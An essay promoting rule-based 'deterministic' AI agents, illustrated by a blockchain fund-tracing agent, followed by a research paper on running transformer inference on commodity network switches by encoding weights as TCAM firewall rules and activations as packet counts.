I built a proof of concept to test this: a blockchain investigation agent that intelligently traces fund flows, detects mixing activity, and identifies KYC exchange deposits for user identification. In a single run, it produced over 38,000 tokens of structured reasoning, making 195 tool calls while doing so, and completed in under 30 seconds, all while running on a VM with only 3 CPU cores and without a GPU.

The more interesting result is what the architecture demonstrates, not what this specific application does.

## What is a Deterministic AI Agent

A deterministic AI agent follows explicit, pre-specified rules to make every decision. Given the same input, it always produces the same output. There are no probability distributions, no sampled tokens, no temperature parameters. The agent's behavior is fully explained by its code, making it fully auditable and predictable.

Structure does not mean simplicity or robotic outputs. A well-built deterministic agent can:

- Call external APIs and tools dynamically
- Adapt its path based on what it finds at each step
- Follow multi-hop reasoning chains across many tool calls
- Generate structured, human-readable analysis of its findings
- Handle branching logic, scoring systems, and multi-factor decisions

What it cannot do is reason outside the bounds of what its rules can express. If a situation falls outside the defined logic, the agent has no mechanism to improvise. That's not a bug. It's a feature. The constraint is exactly what makes it valuable for the right use cases, and what makes it wrong for others.

The interface, from the outside, can look identical to an LLM agent. The blockchain investigation agent streams a `<think>` block in real time, showing tool calls, tool results, and reasoning text as they happen. The "thinking" is generated from templates filled with real data. It's human-readable with zero chance of hallucination.


## The Practical Advantages

### Speed

Current SoTA (state-of-the-art) open source LLMs, models like Kimi K2 (1 trillion parameters) or GLM-5 (745 billion parameters), require tens of thousands of dollars in GPU infrastructure to run at scale. Even with that hardware, generating 38,000 tokens with 195 tool calls takes meaningful time and significant cost per run.

My deterministic agent ran at over 1,200 TPS (tokens per second) on commodity hardware with no GPU. The bottleneck was network latency on external API calls, not compute.

### Cost

The marginal cost of a deterministic agent run is essentially the cost of the API calls it makes to external data sources. There's no inference cost besides less than 100 watts of electricity. A 195-tool-call investigation that would cost several dollars via a frontier LLM API costs fractions of a cent in deterministic compute. 

I actually built the Blockchain Detective with an LLM agent approach as well. The final outputs of the deterministic agent and the LLM-based agent were comparable in quality. But one cost ~1,000x less than the other, and was 10x faster.

This changes what's economically feasible. Longer agentic flows, higher call volumes, more frequent re-runs, all become practical in ways they aren't when tokens have a high price.


### Auditability

Every finding in a deterministic agent's output traces back to a specific rule and a specific data point. There's no "the model said so" or "it just learned that behavior during training". There's a decision tree you can inspect, thresholds you can review, and source data you can verify.

For domains where findings need to be legally defensible, this matters enormously. An LLM-generated analysis is difficult to audit in court. A rule-based analysis with a complete decision trace is straightforward to defend.


### No Hallucinations

A deterministic agent cannot fabricate information. It has no mechanism to do so. The output is a function of the input data and the rules. Nothing else. This is a categorical difference in what's even possible with LLMs.

For high-stakes applications such as financial analysis, medical triage, and legal evidence, this property is non-negotiable.


## The Real Tradeoffs

Deterministic agents are not a better version of LLMs. They're a different tool with a different applicable problem set.

The fundamental limitation is that the agent's intelligence ceiling is a developer's ability to specify rules and understand the domain they are working in. Every edge case the rules don't cover is a gap. Every novel situation the logic doesn't anticipate produces either an error or a wrong answer. LLMs handle novel situations gracefully; deterministic agents handle them poorly or not at all.

This means deterministic agents are appropriate when:

- The decision logic is fully specifiable in advance
- The input space is bounded and well-understood
- Correctness is verifiable against explicit criteria
- The same situation should always produce the same response

LLMs are appropriate when:

- The problem requires insights or connections not capturable in rules
- Input is genuinely ambiguous or open-ended
- Creative or nuanced judgment is required
- Edge cases are too numerous or unpredictable to enumerate

A large fraction of real-world AI agent use cases fall in the first category. Compliance checking, fraud pattern detection, data extraction, report generation from structured sources, automated triage using defined criteria are all problems where the logic is specifiable and determinism is an advantage.


## The LLM-Like UX (User Experience) Layer

One underappreciated design choice in deterministic agents is the interface. Exposing the agent's decision process as a stream of natural language reasoning text, with tool calls, observations, and intermediate conclusions, makes the system interpretable to users who aren't engineers.

This is what the `<think>` block pattern accomplishes. Deterministic AI agents are not actually producing the thinking tokens. Rather, they are presenting the execution in a readable, natural text format that makes the output trustworthy and inspectable in a way that a raw JSON result is not, especially for those less technical.

The "thinking tokens" pattern, originating from reasoning LLMs, is genuinely useful independent of whether the underlying system is probabilistic or deterministic. Users can follow the agent's logic, spot where it made a decision, and verify that the decision was correct. That transparency is harder to achieve with opaque model outputs.


## Historical Context

Some are currently conflating the terms "AI" and "LLM". The truth is that it's more like a square and rectangle. Not all AI systems are LLMs, but all LLMs are AI. Let me provide an example:

IBM Watson won Jeopardy in 2011 using a system with no trained neural network. Rather, it was a combination of information retrieval, NLP pipelines, and statistical scoring across analytical techniques. The public and the industry accepted it as AI. The label followed capability and usefulness, not architecture.

The field has always included rule-based systems, expert systems, statistical models, and hybrid approaches alongside neural networks. The LLM moment has compressed that history out of the common narrative.

Deterministic agents aren't just a throwback or a blast from the past. They're a pattern that remained valid throughout the deep learning era and is increasingly worth reconsidering as LLM costs and complexity push teams to look for alternatives where they can find them.


## What This Looks Like in Practice

The blockchain investigation agent scores every transaction it encounters against defined thresholds:

- CoinJoin mixer detection uses an additive scoring system across input count, output count, output value uniformity, and transaction size. A score above 10 produces a "very high confidence" mixer finding. A score below 4 produces no finding.
- Exchange detection uses transaction volume, total BTC received, and balance ratio to generate a likelihood score.
- Fund flow tracking follows a specific amount through the chain with a 1% fee tolerance, handling splits, consolidations, and high-volume addresses via separate logic paths.

Every threshold has a rationale. Every output can be challenged, reviewed, and defended.

The agent made 195 decisions across a single investigation run, chaining tool calls based on what it found at each step, and produced a complete structured report, all in under 30 seconds.


## Moving Forward

The interesting question is how broad the applicable problem space is. My expectation is that it's larger than the industry currently treats rule-based AI solutions.

Every AI agent deployment carries ongoing inference costs. Every LLM-based agent carries hallucination risk. Every opaque model output creates auditability challenges. For use cases where the logic is specifiable and the stakes are high, those are costs worth avoiding.

The deterministic agent pattern is one way to avoid them. The engineering investment is front-loaded. You have to specify the logic explicitly rather than delegating it to a model, but the operational properties are substantially better for the right workloads.

As open source LLMs continue scaling toward trillion-parameter territory, the compute gap between "use an LLM" and "write explicit rules" will only widen. For the use cases where explicit rules are sufficient, that gap represents a compounding advantage.

Live Demo: [blockchain.acampi.dev](https://blockchain.acampi.dev)

---

<!-- FILE: in_network_matmul_and_llm_inference.md -->

# In-Network Matrix Multiplication for Large Language Model Inference on Commodity Switches

[GitHub](https://github.com/andrewcampi/in_network_matmul_and_llm_inference)


## Abstract

This work establishes the architectural feasibility of executing transformer inference in network switches by demonstrating that neural network primitives can be systematically mapped to packet-processing operations in the data plane. The fundamental contribution is demonstrating that packet counting, a universal switching primitive, implements matrix multiplication, and that complex transformer operations including attention mechanisms, nonlinear activations, and residual connections can be realized entirely through packet forwarding rules.

Using Juniper QFX5100 switches from 2015 (purchased for $250 each on eBay), I validated this mapping on large-scale models: GPT-2 (768 dimensions, 124M parameters) and a dense approximation of GPT-OSS-20B (2880 dimensions, 20B parameters). The core insight is that packet counting implements accumulation, and accumulation implements dot products. By encoding neural network weights as TCAM firewall filter rules and activations as packet counts, the switch's native packet-counting behavior computes matrix multiplication. Complete end-to-end inference on the GPT-OSS-20B architecture processed 756 million packets through 24 transformer layers, maintaining numerical stability (mean=-0.006, std=15.784) despite aggressive 4-bit quantization. The implementation averages all 32 mixture-of-experts per layer into single effective weight matrices rather than implementing dynamic top-k routing, which simplifies the architecture while demonstrating the system can handle MoE-scale weight dimensions.

Architectural innovations enabling arbitrary model scaling include MAC prefix matching (256× TCAM reduction), batch encoding with sequential processing (9,216× reduction), "snake routing" for automatic multi-layer processing, and hierarchical vocabulary projection (99× speedup). Performance analysis identified control-plane access as the bottleneck, not the switching fabric: SSH-based counter reading consumed 92 seconds per layer while packet transmission required only 2 seconds. Validated experiments demonstrate that packet-based counter encoding eliminates this bottleneck with 87× speedup by keeping operations in the data plane.

This work demonstrates that switch-native neural network inference is architecturally feasible for large-scale models and identifies the specific hardware capabilities (programmable parsing, stateful registers, data-plane counter access) that would enable practical deployment for memory-bound inference workloads.

All experiment code, switch configurations, and detailed experiment logs (160+ experiments from proof-of-concept through full 20B-parameter inference) are publicly available in [this github repo](https://github.com/andrewcampi/in_network_matmul_and_llm_inference). Each experiment file contains the resulting output at the end of the file.


## 1. Introduction

Can neural network inference execute natively in network switches using only packet-processing primitives? Prior work has demonstrated that switches can perform gradient aggregation for distributed training (element-wise sums) and simple classification tasks (decision trees on kilobyte-scale models). This work demonstrates that switches can execute complete transformer inference on large-scale models, establishing a systematic mapping from neural network operations to data-plane packet processing.

The fundamental challenge is that switches are designed for packet forwarding, not computation. They lack floating-point units, general-purpose registers, and programmable control flow. However, switches possess a universal primitive that implements accumulation: packet counting. When a firewall filter matches a packet, the associated counter increments atomically in hardware at line rate. Packet counting implements accumulation, and accumulation implements dot products—the fundamental operation in neural networks.

By encoding neural network weights as TCAM firewall filter rules (matching packet destination addresses) and activations as packet counts, the switch's natural packet-counting behavior computes matrix multiplication. A weight of 5 combined with an activation of 3 produces 15 packets, and the switch counter increments by 15. Summing across all inputs yields the dot product. This encoding transforms arbitrary matrix multiplication into a problem of packet generation and counting—operations switches are designed to handle at terabit scale.

**Research Questions**: This work addresses three fundamental questions:

1. **Primitive Mapping**: Can all transformer operations—matrix multiplication, attention mechanisms, nonlinear activations, normalization layers—be implemented using only packet-counting primitives available in commodity switches?

2. **Architectural Scaling**: Can techniques like TCAM prefix matching and sequential batch processing enable switches with limited hardware resources (1,152 TCAM entries) to handle production-scale models with billions of parameters?

3. **Bottleneck Identification**: For the operations that successfully map to switches, what hardware capabilities limit performance and what specific features would enable practical deployment?

**Experimental Validation**: I built a complete system implementing this approach on Juniper QFX5100 switches, deliberately choosing decade-old commodity hardware ($250 each, used) to establish a lower bound on feasibility and create a budgeted experiment that can be replicted. Over 160 experiments (documented as e001-e160 in the public repository), I systematically validated all transformer components: matrix multiplication with 4-bit quantization, grouped query attention, feed-forward networks with mixture-of-experts, nonlinear activations (SiLU, RMSNorm, softmax), rotary position embeddings, and residual connections. The experimental progression advanced from proof-of-concept 4×4 matrix multiplication (Experiment 31) through architectural innovations (MAC prefix matching in Experiment 136, batch encoding in Experiment 143, hierarchical LM head in Experiment 129) to complete GPT-2 inference (Experiment 144) and culminated in full GPT-OSS-20B dimensions at 2880d (Experiment 160).

Testing demonstrated end-to-end inference on GPT-2 (768 dimensions, 12 layers, 124M parameters) and a dense approximation of GPT-OSS-20B (2880 dimensions, 24 layers, 20B parameters). The GPT-OSS-20B run processed 756 million packets through all 24 transformer layers, maintaining numerically stable hidden states (mean=-0.006, std=15.784) throughout the forward pass and generating valid next-token predictions. This demonstrates that the primitive mapping is complete and numerically sound at the scale of modern language models.

**Scope and Limitations**: This work prioritizes architectural completeness over exact model fidelity. The GPT-OSS-20B implementation averages all 32 mixture-of-experts into a single effective weight matrix rather than implementing dynamic top-k routing, which eliminates the conditional computation benefits of MoE but demonstrates the system can handle MoE-scale weight dimensions (32 experts × 2880×2880 = effectively 92,160 dimensions). Full MoE routing is implementable by having the host compute router logits and generate packets only for selected experts, but was not implemented due to complexity and was out of scope. Output tokens are validated for numerical stability (hidden state statistics, no overflow/underflow) but not compared against CPU baselines for exact token-by-token agreement, as the core contribution is demonstrating that transformer primitives can execute entirely in switches using packet-counting operations. These simplifications allow systematic validation of the architectural mapping while identifying the specific hardware capabilities needed for practical deployment.

**Key Finding**: Performance analysis revealed that the switching fabric itself is not the bottleneck. Packet transmission consumed only 2 seconds per layer while SSH-based counter reading consumed 92 seconds per layer. The control-plane access pattern, not data-plane processing capacity, limits current performance. Validated experiments demonstrate that packet-based counter encoding achieves 87× speedup by moving counter reads to the data plane, confirming that the bottleneck is architectural rather than fundamental.

**Contributions**: This work makes the following contributions:

1. **Complete primitive mapping**: A systematic decomposition of transformer operations into packet-counting primitives, demonstrating that complex neural operations including attention, nonlinear activations, and normalization can execute in the data plane
2. **Architectural scaling techniques**: MAC prefix matching (256× TCAM reduction), batch encoding with sequential processing (9,216× reduction), snake routing for multi-layer processing, and hierarchical vocabulary projection (99× speedup)
3. **Large-scale validation**: End-to-end inference on 20B parameter model dimensions demonstrating numerical stability and architectural completeness across 160+ experiments
4. **Bottleneck characterization**: Experimental identification of control-plane access as the limiting factor with validated 87× speedup from data-plane counter encoding

The fact that decade-old $250 switches can execute 20B parameter model dimensions demonstrates that switch-native inference is architecturally feasible for intelligent models in 2026. This work establishes in-network neural computation as a viable paradigm and identifies the specific hardware capabilities (programmable parsing, stateful registers, data-plane counter access) needed for practical deployment on memory-bound inference workloads.


## 2. Background

### 2.1 TCAM and Firewall Filtering

Ternary Content-Addressable Memory (TCAM) is specialized hardware that performs parallel lookups across all entries simultaneously, enabling constant-time searches regardless of table size. Each TCAM entry stores three states per bit: 0, 1, or X (don't care), allowing prefix matching. Network switches use TCAM to implement firewall filters, where each filter consists of match conditions (packet header fields) and actions (count, forward, drop, mirror).

The Juniper QFX5100 uses a Broadcom Trident II ASIC with approximately 1,152 TCAM entries available per firewall filter. Each entry can match on standard packet fields including destination MAC address, source MAC address, VLAN ID, EtherType, and IP headers. When a packet matches a filter term, the switch executes the specified actions atomically at line rate. Counter increments happen in hardware without involving the control-plane CPU, making them extremely fast (billions of packets per second). However, reading counter values traditionally requires querying the control plane via SSH or SNMP, introducing millisecond-scale latencies.

### 2.2 Transformer Architecture

Transformer models consist of stacked blocks, each containing multi-head attention and feed-forward network (FFN) components with residual connections. For an input sequence of length L and hidden dimension d, attention computes:

```
Q = x W_Q,  K = x W_K,  V = x W_V
Attention(Q,K,V) = softmax(QK^T / √d) V
output = Attention(Q,K,V) W_O
```

where W_Q, W_K, W_V, and W_O are learned d × d weight matrices (or d × d_head for multi-head attention). The FFN consists of two linear projections with a nonlinear activation:

```
FFN(x) = activation(x W_up) W_down
```

Grouped Query Attention (GQA) reduces memory bandwidth by having multiple query heads share fewer key-value heads. For example, GPT-OSS-20B uses 16 query heads but only 8 key-value heads.

Modern large language models range from billions to hundreds of billions of parameters, with dimensions from 768 (GPT-2) to in the tens of thousands. The computational pattern is highly regular: matrix multiplication dominates (>90% of operations), activations are fixed functions, and data flow follows a predictable sequence through layers. This regularity makes transformers flexible to specialized hardware implementations.

### 2.3 Memory Bottleneck in GPU Inference

GPU inference for autoregressive generation processes one token at a time, loading all model weights for each forward pass. For a model with P parameters at B bytes per parameter, each token requires P × B bytes transferred from HBM to compute units. A 100B parameter model at fp16 (2 bytes) requires 200 GB per token. The NVIDIA H100 provides 3 TB/s HBM bandwidth, theoretically allowing 15 tokens/second if perfectly saturated. However, actual performance is significantly lower due to:

1. **Arithmetic intensity mismatch:** Loading 200 GB to perform 200 GFLOPS (assuming ~2 ops per parameter) yields 1 FLOP per byte, far below the 312 FLOPS per byte needed to saturate the H100's 2000 TFLOPS
2. **Batch size constraints:** Single-token inference cannot exploit GPU parallelism effectively (though batching multiple requests can significantly improve utilization)
3. **Memory capacity limits:** Models exceeding GPU memory require host-to-device transfers or tensor parallelism across multiple GPUs

This memory bottleneck motivated exploration of alternative compute substrates that prioritize data movement over computation density.


## 3. Matrix Multiplication on Switches

The central challenge is mapping the matrix multiplication operation y = Wx (where W is an m × n weight matrix and x is an n-dimensional input vector) to switch packet-processing primitives. This section describes the encoding schemes and demonstrates how switches compute dot products through their native packet-counting behavior.

### 3.1 Core Principle: Packet Counting as Accumulation

The fundamental insight is that switch counters implement accumulation. When a firewall filter term matches a packet, the associated counter increments by one. Sending multiple packets to the same destination MAC address causes the counter to accumulate the total count. This accumulation operation is exactly what matrix multiplication requires: computing y[i] = Σⱼ W[i,j] × x[j] for each output neuron i.

To compute this sum using packet counting, I encode the weight magnitude as a packet multiplier and the activation magnitude as the number of packets sent. For a weight value of 5 and an activation value of 3, the system sends 15 packets (5 × 3) to the output neuron's counter. The switch counts these packets, implementing the multiplication. Repeating this process for all input neurons j and accumulating into the same output counter i computes the complete dot product.

### 3.2 Encoding Weights as TCAM Rules

I represent each weight W[i,j] as a TCAM firewall filter term that matches packets destined for output neuron i when sent by input neuron j. Using destination MAC addresses as virtual neuron identifiers eliminates the need for physical port connections per neuron.

The MAC address format encodes the neuron index directly: `01:00:5e:00:00:NN` where NN represents the neuron index in hexadecimal. For example, output neuron 5 uses MAC `01:00:5e:00:00:05`. The TCAM rule structure is:

```
match: destination-mac-address 01:00:5e:00:00:05
action: count neuron_5
        accept
```

For a 4-bit quantized weight in range [-8, 7], I store only non-zero weights as TCAM terms. Zero weights require no TCAM entry because sending zero packets to that destination produces zero contribution. This sparse encoding is critical for scaling, as a 1024-neuron layer with 50% sparsity needs only 512 TCAM terms instead of 1024.

Signed arithmetic requires dual counters per neuron: one for positive contributions and one for negative contributions. For output neuron i, I create two TCAM terms with distinct MAC addresses:

```
Positive: 01:00:5e:00:00:NN → count neuron_N_pos
Negative: 01:00:5e:00:80:NN → count neuron_N_neg
```

The high bit in byte 4 (0x80) distinguishes negative from positive. The final value is computed as neuron_N_pos minus neuron_N_neg after reading both counters.

**Example: 4×4 Matrix Multiplication**

Consider a simple 4×4 matrix with input vector x = [3, 2, 4, 1]:

```
W = [1  0  1  0]     x = [3]
    [0  1  1  1]         [2]
    [1  1  0  0]         [4]
    [0  0  1  1]         [1]
```

Expected output: y = [7, 7, 5, 5]

I configure four TCAM terms per output neuron, one for each non-zero weight. For output neuron 0, which has weights [1, 0, 1, 0], I create terms matching packets from input neurons 0 and 2:

```
term out0_in0: match dst=01:00:5e:00:00:00, count neuron0
term out0_in2: match dst=01:00:5e:00:00:00, count neuron0
```

Both terms increment the same counter because they represent contributions to the same output neuron. The switch does not distinguish which input neuron sent the packet after the packet arrives. Rather, it only cares about the destination.

### 3.3 Encoding Activations as Packet Counts

Input activations determine how many packets to send. For activation x[j] = 3, I generate 3 packets for each non-zero connection from input neuron j. The packet generation algorithm is:

```python
for output_idx in range(output_dim):
    weight = W[output_idx, input_idx]
    if weight == 0:
        continue
    
    num_packets = abs(weight) * abs(activation)
    sign = sign(weight) * sign(activation)
    
    if sign > 0:
        mac = f"01:00:5e:00:00:{output_idx:02x}"
    else:
        mac = f"01:00:5e:00:80:{output_idx:02x}"
    
    send_packets(mac, count=num_packets)
```

For the 4×4 example with x = [3, 2, 4, 1], input neuron 0 (x=3) sends:
- 3 packets to output 0 (W[0,0] = 1)
- 3 packets to output 2 (W[2,0] = 1)

Input neuron 2 (x=4) sends:
- 4 packets to output 0 (W[0,2] = 1)
- 4 packets to output 1 (W[1,2] = 1)

And so forth. The total packets sent equals 24 for this example, corresponding to the sum of all |W[i,j]| × |x[j]| for non-zero weights.

**Input Quantization**

Floating-point activations must be quantized to integer packet counts. I use a dynamic scaling approach:

```python
max_val = max(abs(x))
scale = max(max_val / 20.0, 0.01)  # Ensure minimum sensitivity
x_quantized = round(abs(x) / scale)
```

This maps floating-point values to packet counts while preserving relative magnitudes. The scale factor is recorded and used during dequantization after reading switch counters. More aggressive quantization (max_val / 20.0 instead of max_val / 100.0) reduces packet count at the cost of precision, which I found acceptable given that weights are already 4-bit quantized.

### 3.4 Computing Dot Products via Counter Accumulation

Once packets are sent, the switch performs accumulation automatically. Each packet matching a TCAM term causes a counter increment. For output neuron i, the counter value after all packets arrive is:

```
counter[i] = Σⱼ (|W[i,j]| × |x[j]|) for all j where W[i,j] ≠ 0
```

This is exactly the dot product computation, scaled by the quantization factor. To recover the original floating-point result:

```python
result[i] = (counter_pos[i] - counter_neg[i]) * input_scale / weight_scale
```

where input_scale is the quantization factor from activation encoding and weight_scale is the quantization factor used when converting floating-point weights to 4-bit integers.

**Validation: Experiment 31**

I validated this approach with a 4×4 matrix multiplication sending 24 packets total. The switch reported counter values [7, 7, 5, 5], matching the expected CPU result exactly. This proof-of-concept confirmed that packet counting correctly implements matrix multiplication on commodity switch hardware.

### 3.5 Scaling to Large Dimensions

Naive per-neuron encoding requires 2 TCAM terms per output neuron (positive and negative counters), limiting scalability. A 1024-neuron layer needs 2,048 TCAM terms, approaching the QFX5100's limit of 1,152 terms per filter. I developed two techniques to overcome this constraint.

**Technique 1: MAC Prefix Matching (256× reduction)**

Junos firewall filters support prefix matching using CIDR notation. A /40 prefix matches the first 5 bytes of the MAC address, with the last byte being a wildcard. The MAC pattern `02:00:5e:00:BB:00/40` matches all 256 addresses from `02:00:5e:00:BB:00` to `02:00:5e:00:BB:FF`.

Using this feature, I aggregate multiple neurons into batch counters. Instead of per-neuron TCAM terms, I create per-batch terms:

```
term batch0_pos: match dst=02:00:5e:00:00:00/40
                 count batch0_pos
                 
term batch0_neg: match dst=02:00:5e:00:80:00/40
                 count batch0_neg
```

This single TCAM term handles 256 neurons (neuron 0 through 255). For a 2880-dimensional layer with 64-neuron batches, only 45 batches are needed, requiring 90 TCAM terms (45 positive + 45 negative) instead of 5,760 terms for per-neuron encoding—a 64× reduction.

The trade-off is loss of per-neuron resolution. The counter reports the sum of all packets sent to that batch. For applications requiring only the final aggregated result (such as vocabulary projection in hierarchical decoding), this is acceptable. For intermediate layer outputs where individual neuron values are needed, I track packet counts during generation on the host and reconstruct per-neuron values.

**Technique 2: Sequential Processing (9,216× reduction)**

Batch encoding alone reduces TCAM requirements by 64×, but processing layers and projections sequentially provides an additional 144× reduction. Each projection uses the same set of batch-encoded TCAM terms, cleared before each use:

```
1. Clear all counters
2. Send packets for Q projection
3. Read counters → Q output
4. Clear all counters
5. Send packets for K projection
6. Read counters → K output
...
```

With 45 batches and 2 counters per batch (positive/negative), I need only 90 TCAM terms total. These same 90 terms handle unlimited layers and projections through sequential reuse. For a 2880-dimensional model with 24 layers and 6 projections per layer (Q, K, V, O, FFN-up, FFN-down), the naive per-neuron approach requires 24 × 6 × 2880 × 2 = 829,440 TCAM terms. Combining both techniques (64× batch encoding + 144× sequential processing) yields 9,216× total reduction, using only 90 terms.

**Experiment 143 Validation**

Testing batch encoding on 64-dimensional layers with 4 batches of 16 neurons each required 8 TCAM terms for 2 layers across 2 projections. The system showed 21% average error (79% accuracy), which is acceptable given the aggressive 4-bit weight quantization already introduces approximation error. Critically, this experiment revealed a bug in my counter reading code where I was parsing the BYTES field instead of PACKETS field from Junos output, which once fixed, improved accuracy significantly.

### 3.6 Multi-Layer Processing: Snake Architecture

Processing multiple transformer layers sequentially would require the host to read outputs from layer N, send them as inputs to layer N+1, and repeat 24 times for GPT-OSS-20B. Each read-send cycle adds hundreds of milliseconds of latency. I developed a snake routing architecture where packets flow through all layers automatically without host intervention.

The key mechanism is VLAN-based routing combined with MAC-encoded layer identifiers. Each layer is assigned a VLAN (layer 0 = VLAN 100, layer 1 = VLAN 101, etc.). The MAC address format includes the layer index in byte 3:

```
MAC: 01:00:5e:LL:00:NN
     LL = layer index (0-255)
     NN = neuron index (0-255)
```

Firewall filters on each switch match both the destination MAC and the VLAN to route packets:

```
Switch 1 filter (handles layers 0-11):
  term L0_neuron: match vlan=100, dst=01:00:5e:00:**:**
                 count layer0_counters
                 
  term L1_neuron: match vlan=101, dst=01:00:5e:01:**:**
                 count layer1_counters
```

When processing layer 0, the host sends packets tagged with VLAN 100. After the switch processes them, I rewrite packet VLAN tags to 101 (layer 1) and send them back into the switch fabric. Packets automatically route to the layer 1 filter, where they match and increment layer 1 counters.

For multi-switch topologies, inter-switch trunks carry all VLANs. Packets can flow from the host to Switch 1 (layers 0-11), across the trunk to Switch 2 (layers 12-23), and return to the host, traversing all layers with a single initial packet injection and one final read operation.

**Experiment 83 Validation**

Testing with 8 layers across 2 switches, I sent 322 packets in a 7.4ms burst. All 8 layers showed 100% accuracy, with packets automatically routed to the correct layer filters based on VLAN tags. This eliminated per-layer round-trips, reducing latency from seconds to milliseconds for multi-layer processing.

### 3.7 Residual Connections are Free

Transformer blocks include residual connections of the form `output = x + layer(x)`. On traditional hardware, this requires an additional vector addition operation. On switches, residuals cost nothing.

Switches sum all packets arriving at a destination MAC. To compute x + layer(x), I simply send packets for both x and layer(x) to the same destination MACs:

```python
# Generate packets for layer output
for i, value in enumerate(layer_output):
    packets_layer = generate_packets(i, value)
    
# Generate packets for residual
for i, value in enumerate(x):
    packets_residual = generate_packets(i, value)
    
# Send both sets to same destinations
send_all(packets_layer + packets_residual)
```

The switch counters automatically accumulate x[i] + layer[i] without any special handling. This works because the switch does not care why packets arrive at a destination. Rather, it only counts them. For a 24-layer model with 2 residual connections per layer (after attention and after FFN), this represents 48 free addition operations per forward pass.

**Experiment 70 Validation**

Three tests validated residuals: simple vector addition, transformer-style residuals (x + Attention(x)), and chained three-layer residuals. All passed with perfect accuracy, confirming that residual connections incur zero additional computational or latency cost on switches.

### 3.8 Practical Considerations

**Packet Transmission Rate**

The Mellanox ConnectX-3 NIC with DPDK achieves 14.2 million packets per second, a 20.6× speedup over the Linux kernel's ~650K pps limit. For a 2880×2880 matrix multiplication with average packet count of 10 per non-zero element (4-bit weights with average magnitude ~3 multiplied by quantized activation), approximately 25 million packets are needed per projection. At 14.2M pps, transmission takes 1.76 seconds per projection.

**Counter Reading**

Reading counters via SSH takes 2-3 seconds per read, dominating total latency. I validated an alternative approach (Experiment 87) where the switch forwards or mirrors counted packets back to the host. The host counts received packets, recovering counter values at 87× faster speed (8.5ms vs 742.8ms). This data-plane approach eliminates the control-plane bottleneck but was not integrated into the full GPT-OSS-20B pipeline due to time constraints.

**Numerical Stability**

Throughout 24 layers of GPT-OSS-20B inference, hidden states remained stable with mean=-0.006 and standard deviation=15.784. This stability despite aggressive quantization (4-bit weights, dynamic activation scaling) suggests the approach is numerically solid. The dual counter scheme (positive and negative) correctly handles signed arithmetic without accumulation of rounding errors.


## 4. Transformer Operations on Switches

Having established matrix multiplication as the primitive operation, this section describes how complete transformer components map to switch hardware. Each operation either reduces to matrix multiplication or can be implemented through pre-computed lookup tables fused into packet generation.

### 4.1 Attention Mechanisms

Multi-head attention consists of four matrix multiplications: Q = xW_Q, K = xW_K, V = xW_V, and output = attention(Q,K,V)W_O. For single-token generation (the common case during autoregressive inference), the attention mechanism simplifies significantly because there is only one query attending to previously cached keys and values.

I implemented attention by treating each projection as an independent matrix multiplication using the techniques from Section 3. The query projection executes first, followed by key and value projections. For single-token inference, the attention scores (QK^T / √d) and the weighted sum over values both reduce to dot products that execute via packet counting.

Grouped Query Attention (GQA), where multiple query heads share fewer key-value heads, requires no architectural changes. I simply configure fewer TCAM terms for the K and V projections compared to Q. For GPT-OSS-20B's 16Q/8KV configuration, the Q projection generates 4096-dimensional outputs while K and V projections generate 512-dimensional outputs. The outputs are concatenated and processed identically to standard attention.

**Experiment 57** validated attention projections across 2 layers with perfect CPU-switch agreement on all projections and generated 3 output tokens [40, 47, 34] matching CPU exactly. **Experiment 79** confirmed GQA with all 16 heads showing 100% match on Qwen3's exact 16Q/8KV configuration.

### 4.2 Feed-Forward Networks

The FFN consists of two linear projections with a nonlinear activation between them: FFN(x) = activation(xW_up)W_down. Both projections are matrix multiplications executed using the switch matmul primitive. The activation function (SiLU or GELU) executes on the host between the two projections in the baseline implementation.

I demonstrated that SiLU can be moved to the switch using lookup tables. I pre-compute SiLU(x) for 64 quantized input bins and encode the results as packet counts during generation. This eliminates one host round-trip per FFN block.

**Experiment 58** validated all three FFN projections (gate, up, down) showing perfect CPU-switch agreement: gate (32→96) switch=358 vs cpu=358, up (32→96) switch=212 vs cpu=212, down (96→32) switch=102 vs cpu=102. **Experiment 67** demonstrated SiLU on switches with 708 packets and 100% CPU-switch match.

### 4.3 Nonlinear Operations via Lookup Tables

Operations like SiLU, RMSNorm, and softmax involve transcendental functions that switches cannot compute directly. I handle these by pre-computing lookup tables and fusing the results into packet generation.

For RMSNorm, I send packets proportional to each element's square (x[i]²), allowing the switch to compute Σx² via packet counting. The host reads this sum, computes the normalization factor (1/√(Σx² / n)), and applies it during the next packet generation phase.

For softmax in attention (needed for multi-token contexts), I pre-compute exp(x) using a lookup table for quantized input bins. The switch sums Σexp(x) via packet counting. For greedy decoding, only the argmax is needed, eliminating the division step entirely.

**Experiment 68** validated RMSNorm with the switch accumulating sum_sq=173 packets matching the expected value. **Experiment 71** demonstrated softmax with 100% argmax accuracy across 5 test cases.

### 4.4 Rotary Position Embeddings (RoPE)

RoPE applies position-dependent rotations to query and key vectors before attention. Each rotation is a 2×2 matrix multiplication of the form:

```
[cos(θ)  -sin(θ)] [x]
[sin(θ)   cos(θ)] [y]
```

I implement this as a standard matrix multiplication where the rotation matrix is pre-computed for each position using sin/cos lookup tables. The position index determines which rotation matrix to use, and the switch executes the matmul identically to any other weight matrix.

**Experiment 72** validated RoPE across 5 positions (0, 1, 4, 8, 15) and 5 test vectors with 100% CPU-switch match on all cases.

### 4.5 Mixture-of-Experts

GPT-OSS-20B uses 32 experts per FFN layer with top-4 routing. Rather than implement full MoE routing on switches, I simplified by averaging all 32 experts into a single effective weight matrix: W_avg = (1/32)Σ W_expert_i. This reduces the MoE FFN to a standard two-projection FFN that executes using the existing matmul primitive.

While this sacrifices the conditional computation benefits of MoE, it demonstrates that the architecture can handle MoE-scale models (2880d with 32 experts = effectively 92,160 dimensions of FFN weights). Full MoE routing could be implemented by having the host compute router logits and generating packets only for the top-k experts, but I did not implement this.

**Experiment 159** investigated MoE weight loading and successfully dequantized the 32 expert tensors [32, 2880, 2880] and averaged them using np.mean(axis=0) to produce [2880, 2880] effective weight matrices.

### 4.6 Complete Transformer Block

A complete transformer block combines attention (4 matmuls), FFN (2 matmuls), two residual connections, and two RMSNorm operations. I execute these sequentially:

```
1. Read layer input x
2. Compute Q, K, V (3 matmuls on switch)
3. Compute attention scores and weighted sum (on switch)
4. Compute O projection (matmul on switch)
5. Add residual: x + O (free on switch, Section 3.7)
6. Compute RMSNorm (Σx² on switch, scaling on host)
7. Compute FFN up projection (matmul on switch)
8. Apply SiLU (LUT on host or fused in packets)
9. Compute FFN down projection (matmul on switch)
10. Add residual (free on switch)
11. Output becomes input to next layer
```

